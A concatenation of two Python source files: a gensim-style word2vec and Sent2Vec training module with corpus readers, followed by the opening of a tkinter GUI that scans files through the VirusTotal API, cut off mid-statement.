raise RuntimeError("you must first build vocabulary before training the model")
start, next_report = time.time(), [1.0]
word_count = [word_count]
total_words = total_words or int(sum(v.count * v.sample_probability for v in itervalues(self.vocab)))
jobs = Queue(maxsize=2 * self.workers) # buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
lock = threading.Lock() # for shared state (=number of words trained so far, log reports...)
def worker_train():
"""Train the model, lifting lists of sentences from the jobs queue."""
work = zeros(self.layer1_size, dtype=REAL) # each thread must have its own work memory
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
while True:
job = jobs.get()
if job is None: # data finished, exit
break
# update the learning rate before every job
alpha = max(self.min_alpha, self.alpha * (1 - 1.0 * word_count[0] / total_words))
# how many words did we train on? out-of-vocabulary (unknown) words do not count
if self.sg:
job_words = sum(train_sentence_sg(self, sentence, alpha, work) for sentence in job)
else:
job_words = sum(train_sentence_cbow(self, sentence, alpha, work, neu1) for sentence in job)
with lock:
word_count[0] += job_words
elapsed = time.time() - start
if elapsed >= next_report[0]:
logger.info("PROGRESS: at %.2f%% words, alpha %.05f, %.0f words/s" %
(100.0 * word_count[0] / total_words, alpha, word_count[0] / elapsed if elapsed else 0.0))
next_report[0] = elapsed + 1.0 # don't flood the log, wait at least a second between progress reports
workers = [threading.Thread(target=worker_train) for _ in xrange(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
def prepare_sentences():
for sentence in sentences:
# avoid calling random_sample() where prob >= 1, to speed things up a little:
sampled = [self.vocab[word] for word in sentence
if word in self.vocab and (self.vocab[word].sample_probability >= 1.0 or self.vocab[word].sample_probability >= random.random_sample())]
yield sampled
# convert input strings to Vocab objects (eliding OOV/downsampled words), and start filling the jobs queue
for job_no, job in enumerate(utils.grouper(prepare_sentences(), chunksize)):
logger.debug("putting job #%i in the queue, qsize=%i" % (job_no, jobs.qsize()))
jobs.put(job)
logger.info("reached the end of input; waiting to finish %i outstanding jobs" % jobs.qsize())
for _ in xrange(self.workers):
jobs.put(None) # give the workers heads up that they can finish -- no more work!
for thread in workers:
thread.join()
elapsed = time.time() - start
logger.info("training on %i words took %.1fs, %.0f words/s" %
(word_count[0], elapsed, word_count[0] / elapsed if elapsed else 0.0))
return word_count[0]
def reset_weights(self):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
logger.info("resetting layer weights")
random.seed(self.seed)
self.syn0 = empty((len(self.vocab), self.layer1_size), dtype=REAL)
# randomize weights vector by vector, rather than materializing a huge random matrix in RAM at once
for i in xrange(len(self.vocab)):
self.syn0[i] = (random.rand(self.layer1_size) - 0.5) / self.layer1_size
if self.hs:
self.syn1 = zeros((len(self.vocab), self.layer1_size), dtype=REAL)
if self.negative:
self.syn1neg = zeros((len(self.vocab), self.layer1_size), dtype=REAL)
self.syn0norm = None
def save_word2vec_format(self, fname, fvocab=None, binary=False):
"""
Store the input-hidden weight matrix in the same format used by the original
C word2vec-tool, for compatibility.
"""
if fvocab is not None:
logger.info("Storing vocabulary in %s" % (fvocab))
with utils.smart_open(fvocab, 'wb') as vout:
for word, vocab in sorted(iteritems(self.vocab), key=lambda item: -item[1].count):
vout.write(utils.to_utf8("%s %s\n" % (word, vocab.count)))
logger.info("storing %sx%s projection weights into %s" % (len(self.vocab), self.layer1_size, fname))
assert (len(self.vocab), self.layer1_size) == self.syn0.shape
with utils.smart_open(fname, 'wb') as fout:
fout.write(utils.to_utf8("%s %s\n" % self.syn0.shape))
# store in sorted order: most frequent words at the top
for word, vocab in sorted(iteritems(self.vocab), key=lambda item: -item[1].count):
row = self.syn0[vocab.index]
if binary:
fout.write(utils.to_utf8(word) + b" " + row.tostring())
else:
fout.write(utils.to_utf8("%s %s\n" % (word, ' '.join("%f" % val for val in row))))
@classmethod
def load_word2vec_format(cls, fname, fvocab=None, binary=False, norm_only=True):
"""
Load the input-hidden weight matrix from the original C word2vec-tool format.
Note that the information stored in the file is incomplete (the binary tree is missing),
so while you can query for word similarity etc., you cannot continue training
with a model loaded this way.
`binary` is a boolean indicating whether the data is in binary word2vec format.
`norm_only` is a boolean indicating whether to only store normalised word2vec vectors in memory.
Word counts are read from `fvocab` filename, if set (this is the file generated
by `-save-vocab` flag of the original C tool).
"""
counts = None
if fvocab is not None:
logger.info("loading word counts from %s" % (fvocab))
counts = {}
with utils.smart_open(fvocab) as fin:
for line in fin:
word, count = utils.to_unicode(line).strip().split()
counts[word] = int(count)
logger.info("loading projection weights from %s" % (fname))
with utils.smart_open(fname) as fin:
header = utils.to_unicode(fin.readline())
vocab_size, layer1_size = map(int, header.split()) # throws for invalid file format
result = Word2Vec(size=layer1_size)
result.syn0 = zeros((vocab_size, layer1_size), dtype=REAL)
if binary:
binary_len = dtype(REAL).itemsize * layer1_size
for line_no in xrange(vocab_size):
# mixed text and binary: read text first, then binary
word = []
while True:
ch = fin.read(1)
if ch == b' ':
break
if ch != b'\n': # ignore newlines in front of words (some binary files have newline, some don't)
word.append(ch)
word = utils.to_unicode(b''.join(word))
if counts is None:
result.vocab[word] = Vocab(index=line_no, count=vocab_size - line_no)
elif word in counts:
result.vocab[word] = Vocab(index=line_no, count=counts[word])
else:
logger.warning("vocabulary file is incomplete")
result.vocab[word] = Vocab(index=line_no, count=None)
result.index2word.append(word)
result.syn0[line_no] = fromstring(fin.read(binary_len), dtype=REAL)
else:
for line_no, line in enumerate(fin):
parts = utils.to_unicode(line).split()
if len(parts) != layer1_size + 1:
raise ValueError("invalid vector on line %s (is this really the text format?)" % (line_no))
word, weights = parts[0], list(map(REAL, parts[1:]))  # list() so numpy can assign the row under Python 3
if counts is None:
result.vocab[word] = Vocab(index=line_no, count=vocab_size - line_no)
elif word in counts:
result.vocab[word] = Vocab(index=line_no, count=counts[word])
else:
logger.warning("vocabulary file is incomplete")
result.vocab[word] = Vocab(index=line_no, count=None)
result.index2word.append(word)
result.syn0[line_no] = weights
logger.info("loaded %s matrix from %s" % (result.syn0.shape, fname))
result.init_sims(norm_only)
return result
def most_similar(self, positive=[], negative=[], topn=10):
"""
Find the top-N most similar words. Positive words contribute positively towards the
similarity, negative words negatively.
This method computes cosine similarity between a simple mean of the projection
weight vectors of the given words, and corresponds to the `word-analogy` and
`distance` scripts in the original word2vec implementation.
Example::
>>> trained_model.most_similar(positive=['woman', 'king'], negative=['man'])
[('queen', 0.50882536), ...]
"""
self.init_sims()
if isinstance(positive, string_types) and not negative:
# allow calls like most_similar('dog'), as a shorthand for most_similar(['dog'])
positive = [positive]
# add weights for each word, if not already present; default to 1.0 for positive and -1.0 for negative words
positive = [(word, 1.0) if isinstance(word, string_types + (ndarray,))
else word for word in positive]
negative = [(word, -1.0) if isinstance(word, string_types + (ndarray,))
else word for word in negative]
# compute the weighted average of all words
all_words, mean = set(), []
for word, weight in positive + negative:
if isinstance(word, ndarray):
mean.append(weight * word)
elif word in self.vocab:
mean.append(weight * self.syn0norm[self.vocab[word].index])
all_words.add(self.vocab[word].index)
else:
raise KeyError("word '%s' not in vocabulary" % word)
if not mean:
raise ValueError("cannot compute similarity with no input")
mean = matutils.unitvec(array(mean).mean(axis=0)).astype(REAL)
dists = dot(self.syn0norm, mean)
if not topn:
return dists
best = argsort(dists)[::-1][:topn + len(all_words)]
# ignore (don't return) words from the input
result = [(self.index2word[sim], float(dists[sim])) for sim in best if sim not in all_words]
return result[:topn]
def doesnt_match(self, words):
"""
Which word from the given list doesn't go with the others?
Example::
>>> trained_model.doesnt_match("breakfast cereal dinner lunch".split())
'cereal'
"""
self.init_sims()
words = [word for word in words if word in self.vocab] # filter out OOV words
logger.debug("using words %s" % words)
if not words:
raise ValueError("cannot select a word from an empty list")
vectors = vstack([self.syn0norm[self.vocab[word].index] for word in words]).astype(REAL)  # vstack needs a sequence, not a generator
mean = matutils.unitvec(vectors.mean(axis=0)).astype(REAL)
dists = dot(vectors, mean)
return sorted(zip(dists, words))[0][1]
def __getitem__(self, word):
"""
Return a word's representations in vector space, as a 1D numpy array.
Example::
>>> trained_model['woman']
array([ -1.40128313e-02, ...]
"""
return self.syn0[self.vocab[word].index]
def __contains__(self, word):
return word in self.vocab
def similarity(self, w1, w2):
"""
Compute cosine similarity between two words.
Example::
>>> trained_model.similarity('woman', 'man')
0.73723527
>>> trained_model.similarity('woman', 'woman')
1.0
"""
return dot(matutils.unitvec(self[w1]), matutils.unitvec(self[w2]))
def init_sims(self, replace=False):
"""
Precompute L2-normalized vectors.
If `replace` is set, forget the original vectors and only keep the normalized
ones = saves lots of memory!
Note that you **cannot continue training** after doing a replace. The model becomes
effectively read-only = you can call `most_similar`, `similarity` etc., but not `train`.
"""
if getattr(self, 'syn0norm', None) is None or replace:
logger.info("precomputing L2-norms of word weight vectors")
if replace:
for i in xrange(self.syn0.shape[0]):
self.syn0[i, :] /= sqrt((self.syn0[i, :] ** 2).sum(-1))
self.syn0norm = self.syn0
if hasattr(self, 'syn1'):
del self.syn1
else:
self.syn0norm = (self.syn0 / sqrt((self.syn0 ** 2).sum(-1))[..., newaxis]).astype(REAL)
def accuracy(self, questions, restrict_vocab=30000):
"""
Compute accuracy of the model. `questions` is a filename where lines are
4-tuples of words, split into sections by ": SECTION NAME" lines.
See https://code.google.com/p/word2vec/source/browse/trunk/questions-words.txt for an example.
The accuracy is reported (=printed to log and returned as a list) for each
section separately, plus there's one aggregate summary at the end.
Use `restrict_vocab` to ignore all questions containing a word whose frequency
is not in the top-N most frequent words (default top 30,000).
This method corresponds to the `compute-accuracy` script of the original C word2vec.
"""
ok_vocab = dict(sorted(iteritems(self.vocab),
key=lambda item: -item[1].count)[:restrict_vocab])
ok_index = set(v.index for v in itervalues(ok_vocab))
def log_accuracy(section):
correct, incorrect = section['correct'], section['incorrect']
if correct + incorrect > 0:
logger.info("%s: %.1f%% (%i/%i)" %
(section['section'], 100.0 * correct / (correct + incorrect),
correct, correct + incorrect))
sections, section = [], None
for line_no, line in enumerate(utils.smart_open(questions)):
# TODO: use level3 BLAS (=evaluate multiple questions at once), for speed
line = utils.to_unicode(line)
if line.startswith(': '):
# a new section starts => store the old section
if section:
sections.append(section)
log_accuracy(section)
section = {'section': line.lstrip(': ').strip(), 'correct': 0, 'incorrect': 0}
else:
if not section:
raise ValueError("missing section header before line #%i in %s" % (line_no, questions))
try:
a, b, c, expected = [word.lower() for word in line.split()] # TODO assumes vocabulary preprocessing uses lowercase, too...
except ValueError:
logger.info("skipping invalid line #%i in %s" % (line_no, questions))
continue
if a not in ok_vocab or b not in ok_vocab or c not in ok_vocab or expected not in ok_vocab:
logger.debug("skipping line #%i with OOV words: %s" % (line_no, line))
continue
ignore = set(self.vocab[v].index for v in [a, b, c]) # indexes of words to ignore
predicted = None
# find the most likely prediction, ignoring OOV words and input words
for index in argsort(self.most_similar(positive=[b, c], negative=[a], topn=False))[::-1]:
if index in ok_index and index not in ignore:
predicted = self.index2word[index]
if predicted != expected:
logger.debug("%s: expected %s, predicted %s" % (line.strip(), expected, predicted))
break
section['correct' if predicted == expected else 'incorrect'] += 1
if section:
# store the last section, too
sections.append(section)
log_accuracy(section)
total = {'section': 'total', 'correct': sum(s['correct'] for s in sections), 'incorrect': sum(s['incorrect'] for s in sections)}
log_accuracy(total)
sections.append(total)
return sections
def __str__(self):
return "Word2Vec(vocab=%s, size=%s, alpha=%s)" % (len(self.index2word), self.layer1_size, self.alpha)
def save(self, *args, **kwargs):
kwargs['ignore'] = kwargs.get('ignore', ['syn0norm']) # don't bother storing the cached normalized vectors
super(Word2Vec, self).save(*args, **kwargs)
class Sent2Vec(utils.SaveLoad):
def __init__(self, sentences, model_file=None, alpha=0.025, window=5, sample=0, seed=1,
workers=1, min_alpha=0.0001, sg=1, hs=1, negative=0, cbow_mean=0, iteration=1):
self.sg = int(sg)
self.table = None # for negative sampling --> this needs a lot of RAM! consider setting back to None before saving
self.alpha = float(alpha)
self.window = int(window)
self.seed = seed
self.sample = sample
self.workers = workers
self.min_alpha = min_alpha
self.hs = hs
self.negative = negative
self.cbow_mean = int(cbow_mean)
self.iteration = iteration
self.sentences = {}
if model_file and sentences:
self.w2v = Word2Vec.load(model_file)
self.vocab = self.w2v.vocab
self.layer1_size = self.w2v.layer1_size
self.reset_sent_vec(sentences)
for i in range(iteration):
self.train_sent(sentences)
def reset_sent_vec(self, sentences):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
#logger.info("resetting vectors for sentences")
random.seed(self.seed)
self.sents_len = 0
for sent in sentences:
self.sentences[str(self.sents_len)] = ' '.join(sent)
self.sents_len += 1
self.sents = empty((self.sents_len, self.layer1_size), dtype=REAL)
# randomize weights vector by vector, rather than materializing a huge random matrix in RAM at once
for i in xrange(self.sents_len):
self.sents[i] = (random.rand(self.layer1_size) - 0.5) / self.layer1_size
def train_sent(self, sentences, total_words=None, word_count=0, sent_count=0, chunksize=100):
"""
Update the model's neural weights from a sequence of sentences (can be a once-only generator stream).
Each sentence must be a list of unicode strings.
"""
#logger.info("training model with %i workers on %i sentences and %i features, "
# "using 'skipgram'=%s 'hierarchical softmax'=%s 'subsample'=%s and 'negative sampling'=%s" %
# (self.workers, self.sents_len, self.layer1_size, self.sg, self.hs, self.sample, self.negative))
if not self.vocab:
raise RuntimeError("you must first build vocabulary before training the model")
start, next_report = time.time(), [1.0]
word_count = [word_count]
sent_count = [sent_count]
total_words = total_words or sum(v.count for v in itervalues(self.vocab))
total_sents = self.sents_len * self.iteration
jobs = Queue(maxsize=2 * self.workers) # buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
lock = threading.Lock() # for shared state (=number of words trained so far, log reports...)
def worker_train():
"""Train the model, lifting lists of sentences from the jobs queue."""
work = zeros(self.layer1_size, dtype=REAL) # each thread must have its own work memory
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
while True:
job = jobs.get()
if job is None: # data finished, exit
break
# update the learning rate before every job
alpha = max(self.min_alpha, self.alpha * (1 - 1.0 * word_count[0] / total_words))
if self.sg:
job_words = sum(self.train_sent_vec_sg(self.w2v, sent_no, sentence, alpha, work)
for sent_no, sentence in job)
else:
job_words = sum(self.train_sent_vec_cbow(self.w2v, sent_no, sentence, alpha, work, neu1)
for sent_no, sentence in job)
with lock:
word_count[0] += job_words
sent_count[0] += chunksize
elapsed = time.time() - start
if elapsed >= next_report[0]:
#logger.info("PROGRESS: at %.2f%% sents, alpha %.05f, %.0f words/s" %
# (100.0 * sent_count[0] / total_sents, alpha, word_count[0] / elapsed if elapsed else 0.0))
next_report[0] = elapsed + 1.0 # don't flood the log, wait at least a second between progress reports
workers = [threading.Thread(target=worker_train) for _ in xrange(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
def prepare_sentences():
for sent_no, sentence in enumerate(sentences):
# avoid calling random_sample() where prob >= 1, to speed things up a little:
# sampled = [self.vocab[word] for word in sentence
# if word in self.vocab and (self.vocab[word].sample_probability >= 1.0 or self.vocab[word].sample_probability >= random.random_sample())]
sampled = [self.vocab.get(word, None) for word in sentence]
yield (sent_no, sampled)
# convert input strings to Vocab objects (eliding OOV/downsampled words), and start filling the jobs queue
for job_no, job in enumerate(utils.grouper(prepare_sentences(), chunksize)):
logger.debug("putting job #%i in the queue, qsize=%i" % (job_no, jobs.qsize()))
jobs.put(job)
#logger.info("reached the end of input; waiting to finish %i outstanding jobs" % jobs.qsize())
for _ in xrange(self.workers):
jobs.put(None) # give the workers heads up that they can finish -- no more work!
for thread in workers:
thread.join()
elapsed = time.time() - start
#logger.info("training on %i words took %.1fs, %.0f words/s" %
# (word_count[0], elapsed, word_count[0] / elapsed if elapsed else 0.0))
return word_count[0]
def train_sent_vec_cbow(self, model, sent_no, sentence, alpha, work=None, neu1=None):
"""
Update CBOW model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary). Called internally from `train_sent()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
sent_vec = self.sents[sent_no]
if self.negative:
# precompute negative labels
labels = zeros(self.negative + 1)
labels[0] = 1.
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(self.window) # `b` in the original word2vec code
start = max(0, pos - self.window + reduced_window)
window_pos = enumerate(sentence[start : pos + self.window + 1 - reduced_window], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.syn0[word2_indices], axis=0) # 1 x layer1_size
l1 += sent_vec
if word2_indices and self.cbow_mean:
l1 /= len(word2_indices)
neu1e = zeros(l1.shape)
if self.hs:
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
fa = 1. / (1. + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1. - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if self.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < self.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# model.syn0[word2_indices] += neu1e # learn input -> hidden, here for all words in the window separately
self.sents[sent_no] += neu1e # learn input -> hidden, here for all words in the window separately
return len([word for word in sentence if word is not None])
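# Note on the update above: with hierarchical softmax, fa = sigmoid(l1 . syn1[point]^T)
# and the error ga = (1 - code - fa) * alpha is accumulated into neu1e, which is
# then added only to the sentence vector self.sents[sent_no]; the word vectors
# (syn0) and output weights (syn1/syn1neg) stay frozen -- their updates are left
# commented out above.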
def train_sent_vec_sg(self, model, sent_no, sentence, alpha, work=None):
"""
Update skip-gram model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary). Called internally from `train_sent()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
if self.negative:
# precompute negative labels
labels = zeros(self.negative + 1)
labels[0] = 1.0
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(model.window) # `b` in the original word2vec code
# now go over all words from the (reduced) window, predicting each one in turn
start = max(0, pos - model.window + reduced_window)
for pos2, word2 in enumerate(sentence[start : pos + model.window + 1 - reduced_window], start):
# don't train on OOV words and on the `word` itself
if word2:
# l1 = model.syn0[word.index]
l1 = self.sents[sent_no]
neu1e = zeros(l1.shape)
if self.hs:
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
l2a = deepcopy(model.syn1[word2.point]) # 2d matrix, codelen x layer1_size
fa = 1.0 / (1.0 + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1 - word2.code - fa) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1[word2.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if self.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word2.index]
while len(word_indices) < model.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word2.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# model.syn0[word.index] += neu1e # learn input -> hidden
self.sents[sent_no] += neu1e # learn input -> hidden
return len([word for word in sentence if word is not None])
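# Unlike standard skip-gram, l1 here is the sentence vector rather than the
# input word vector (model.syn0[word.index]), so each context prediction only
# nudges self.sents[sent_no]; the pretrained word2vec weights are left intact.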
def save_sent2vec_format(self, fname):
"""
Store the input-hidden weight matrix in the same format used by the original
C word2vec-tool, for compatibility.
"""
logger.info("storing %sx%s projection weights into %s" % (self.sents_len, self.layer1_size, fname))
assert (self.sents_len, self.layer1_size) == self.sents.shape
with utils.smart_open(fname, 'wb') as fout:
fout.write(utils.to_utf8("%s %s\n" % self.sents.shape))
# store in sorted order: most frequent words at the top
for sent_no in xrange(self.sents_len):
row = self.sents[sent_no]
fout.write(utils.to_utf8("sent_%d %s\n" % (sent_no, ' '.join("%f" % val for val in row))))
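# Resulting file layout (values illustrative): one header line, then one line
# per sentence vector:
#   <sents_len> <layer1_size>
#   sent_0 0.123456 -0.654321 ...
#   sent_1 ...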
def similarity(self, sent1, sent2):
"""
Compute cosine similarity between two sentences. `sent1` and `sent2` are
sentence indices in the training file.
Example::
>>> trained_model.similarity(0, 0)
1.0
>>> trained_model.similarity(1, 3)
0.73
"""
return dot(matutils.unitvec(self.sents[sent1]), matutils.unitvec(self.sents[sent2]))
class BrownCorpus(object):
"""Iterate over sentences from the Brown corpus (part of NLTK data)."""
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
fname = os.path.join(self.dirname, fname)
if not os.path.isfile(fname):
continue
for line in utils.smart_open(fname):
line = utils.to_unicode(line)
# each file line is a single sentence in the Brown corpus
# each token is WORD/POS_TAG
token_tags = [t.split('/') for t in line.split() if len(t.split('/')) == 2]
# ignore words with non-alphabetic tags like ",", "!" etc (punctuation, weird stuff)
words = ["%s/%s" % (token.lower(), tag[:2]) for token, tag in token_tags if tag[:2].isalpha()]
if not words: # don't bother sending out empty sentences
continue
yield words
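# e.g. (path is hypothetical): sentences = BrownCorpus('/path/to/nltk_data/corpora/brown')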
class Text8Corpus(object):
"""Iterate over sentences from the "text8" corpus, unzipped from http://mattmahoney.net/dc/text8.zip ."""
def __init__(self, fname):
self.fname = fname
def __iter__(self):
# the entire corpus is one gigantic line -- there are no sentence marks at all
# so just split the sequence of tokens arbitrarily: 1 sentence = 1000 tokens
sentence, rest, max_sentence_length = [], b'', 1000
with utils.smart_open(self.fname) as fin:
while True:
text = rest + fin.read(8192) # avoid loading the entire file (=1 line) into RAM
if text == rest: # EOF
sentence.extend(rest.split()) # return the last chunk of words, too (may be shorter/longer)
if sentence:
yield sentence
break
last_token = text.rfind(b' ') # the last token may have been split in two... keep it for the next iteration
words, rest = (utils.to_unicode(text[:last_token]).split(), text[last_token:].strip()) if last_token >= 0 else ([], text)
sentence.extend(words)
while len(sentence) >= max_sentence_length:
yield sentence[:max_sentence_length]
sentence = sentence[max_sentence_length:]
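# e.g.: sentences = Text8Corpus('text8')  # the unzipped file from the URL above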
class LineSentence(object):
"""Simple format: one sentence = one line; words already preprocessed and separated by whitespace."""
def __init__(self, source):
"""
`source` can be either a string or a file object.
Example::
sentences = LineSentence('myfile.txt')
Or for compressed files::
sentences = LineSentence('compressed_text.txt.bz2')
sentences = LineSentence('compressed_text.txt.gz')
"""
self.source = source
def __iter__(self):
"""Iterate through the lines in the source."""
try:
# Assume it is a file-like object and try treating it as such
# Things that don't have seek will trigger an exception
self.source.seek(0)
for line in self.source:
yield utils.to_unicode(line).split()
except AttributeError:
# If it didn't work like a file, use it as a string filename
with utils.smart_open(self.source) as fin:
for line in fin:
yield utils.to_unicode(line).split()
# Example: ./word2vec.py ~/workspace/word2vec/text8 ~/workspace/word2vec/questions-words.txt ./text8
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s', level=logging.INFO)
logging.info("running %s" % " ".join(sys.argv))
logging.info("using optimization %s" % FAST_VERSION)
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print(globals()['__doc__'] % locals())
sys.exit(1)
seterr(all='raise') # don't ignore numpy errors
if len(sys.argv) > 3:
input_file = sys.argv[1]
model_file = sys.argv[2]
out_file = sys.argv[3]
model = Sent2Vec(LineSentence(input_file), model_file=model_file, iteration=100)
model.save_sent2vec_format(out_file)
elif len(sys.argv) > 1:
input_file = sys.argv[1]
model = Word2Vec(LineSentence(input_file), size=100, window=5, min_count=5, workers=8)
model.save(input_file + '.model')
model.save_word2vec_format(input_file + '.vec')
else:
pass
program = os.path.basename(sys.argv[0])
logging.info("finished running %s" % program)
|
virustotal_scan.py
|
from virustotal_python import Virustotal
from tkinter import (
Tk,
Label,
Button,
Menu,
Canvas,
PanedWindow,
Frame,
Scrollbar,
Listbox,
Checkbutton,
)
from tkinter.filedialog import (
askdirectory,
askopenfilename,
askopenfilenames,
asksaveasfilename,
)
from tkinter.messagebox import showinfo
from tkinter.ttk import Combobox
from tkinter import (
LEFT,
RIGHT,
TOP,
BOTTOM,
HORIZONTAL,
VERTICAL,
CENTER,
X,
Y,
BOTH,
DISABLED,
NORMAL,
Toplevel,
)
from os.path import basename, isfile, getsize
from os import listdir
from time import sleep
import json, threading, virustotal_exception, datetime, pickle
from virustotal_text import about_text
from hashlib import sha256
from API_key import API_key
DEBUG = False
vtotal = Virustotal(API_key)
# note: the same file can be added to the scan list multiple times
# TODO: improve the thread handling: stop_scan currently waits for the running scan to finish before shutting everything down, so it can take a while
# TODO: Sphinx documentation
class virustotal_scan(threading.Thread):
"""
A class used to scan file(s) using the VirusTotal Public API
Attributes
----------
init_end : bool
Flag used to enable the resize event
Waiting_file_list : list, str
List of waiting file paths (files to scan)
OK_file_list : list, str
List of OK file paths (scanned, clean)
NOK_file_list : list, str
List of NOK file paths (scanned, flagged)
main_widows : Tk
Tkinter main window
menubar :
...
ok_list : Listbox
Listbox containing the OK file paths
Nok_list : Listbox
Listbox containing the NOK file paths
Waiting_list : Listbox
Listbox containing the paths of files waiting to be scanned
Methods
-------
show_help()
Show help in a new window
resize_windows(event)
Dynamically resize Frame and PanedWindow widths to match the main window width
update_waiting_list(files_list_name)
Clear and update the waiting_list Listbox
update_ok_list(files_list_name)
Clear and update the ok_list Listbox
update_Nok_list(files_list_name)
Clear and update the Nok_list Listbox
"""
def __init__(self, *args, **kwargs):
"""
Initialize the class, using tkinter to build the graphical interface
"""
super(virustotal_scan, self).__init__(*args, **kwargs)
# ====================== variables ======================
self.THREAD_IS_ACTIVE = True
self.thread_down = False
self.scan_stopped = False
self.call_start_scan = False
self.force_scan = False
self.error_log_list = list("")
self.init_end = False
self.Waiting_file_list = list("")
self.OK_file_list = list("")
self.NOK_file_list = list("")
self.Nok_file_list_scan_result_dict = dict()
self.main_widows = Tk()
# ====================== init main windows ======================
self.main_widows.protocol("WM_DELETE_WINDOW", self.close_app)
self.main_widows.title("VIRUSTOTAL SCAN")
self.main_widows.minsize(600, 480)
self.main_widows.geometry("600x500")
self.main_widows.iconbitmap(".\\img\\vt_logo.ico")
# ====================== menu top bar ======================
self.menubar = Menu(self.main_widows)
self.menu_help = Menu(self.menubar, tearoff=0)
self.menu_help.add_command(label="A propos", command=self.show_help)
self.menu_help.add_command(label="ERROR LOGS", command=self.show_error_log)
self.menubar.add_cascade(label="Aide", menu=self.menu_help)
self.menu_save = Menu(self.menubar, tearoff=0)
self.menu_save.add_command(label="Import", command=self.import_waiting_list)
self.menu_save.add_command(label="Export", command=self.export_waiting_list)
self.menubar.add_cascade(label="Save/Load", menu=self.menu_save)
self.menubar.add_command(label="Quitter", command=self.close_app)
self.menubar.add_command(label="Clear", command=self.clear_list)
self.menubar.add_command(label="Nok result", command=self.show_nok_result)
self.main_widows.config(menu=self.menubar)
# ====================== top texte ======================
self.label = Label(self.main_widows, text="Virus Total Scan")
self.label.pack()
# ====================== first panelwindow ======================
self.first_panelwindow = PanedWindow(
self.main_widows, orient=HORIZONTAL, width=self.main_widows.winfo_width()
)
self.first_panelwindow.bind("<Configure>", self.resize_windows)
self.first_panelwindow.pack(fill=X)
# ====================== OK list ======================
self.ok_list_panedwindow = PanedWindow(
self.first_panelwindow, height=200, width=100, background="ivory"
)
self.ok_list_panedwindow.grid_propagate(False)
self.ok_list_panedwindow.propagate(False)
self.ok_list_panedwindow.pack(side=LEFT, padx=5, pady=5)
Label(self.ok_list_panedwindow, text="File(s) clean", background="ivory").pack(
fill=X
)
self.ok_list_frame = Frame(self.ok_list_panedwindow, background="ivory")
self.ok_list_frame.pack(fill=X, padx=5, pady=5)
ok_list_scrollbar_X = Scrollbar(self.ok_list_frame, orient=HORIZONTAL)
ok_list_scrollbar_X.pack(side=TOP, fill=X)
ok_list_scrollbar_Y = Scrollbar(self.ok_list_frame, orient=VERTICAL)
ok_list_scrollbar_Y.pack(side=RIGHT, fill=Y)
self.ok_list = Listbox(
self.ok_list_frame,
yscrollcommand=ok_list_scrollbar_Y.set,
xscrollcommand=ok_list_scrollbar_X.set,
)
self.ok_list.pack(side=LEFT)
ok_list_scrollbar_Y.config(command=self.ok_list.yview)
ok_list_scrollbar_X.config(command=self.ok_list.xview)
# ====================== waiting list ======================
self.Waiting_list_panedwindow = PanedWindow(
self.first_panelwindow, height=200, width=100, background="ivory"
)
self.Waiting_list_panedwindow.grid_propagate(False)
self.Waiting_list_panedwindow.propagate(False)
self.Waiting_list_panedwindow.pack(side=LEFT, padx=5, pady=5)
Label(
self.Waiting_list_panedwindow, text="File(s) List", background="ivory"
).pack(fill=X)
self.Waiting_list_frame = Frame(
self.Waiting_list_panedwindow, background="ivory"
)
self.Waiting_list_frame.pack(fill=X, padx=5, pady=5)
Waiting_list_scrollbar_X = Scrollbar(self.Waiting_list_frame, orient=HORIZONTAL)
Waiting_list_scrollbar_X.pack(side=TOP, fill=X)
Waiting_list_scrollbar_Y = Scrollbar(self.Waiting_list_frame, orient=VERTICAL)
Waiting_list_scrollbar_Y.pack(side=RIGHT, fill=Y)
self.Waiting_list = Listbox(
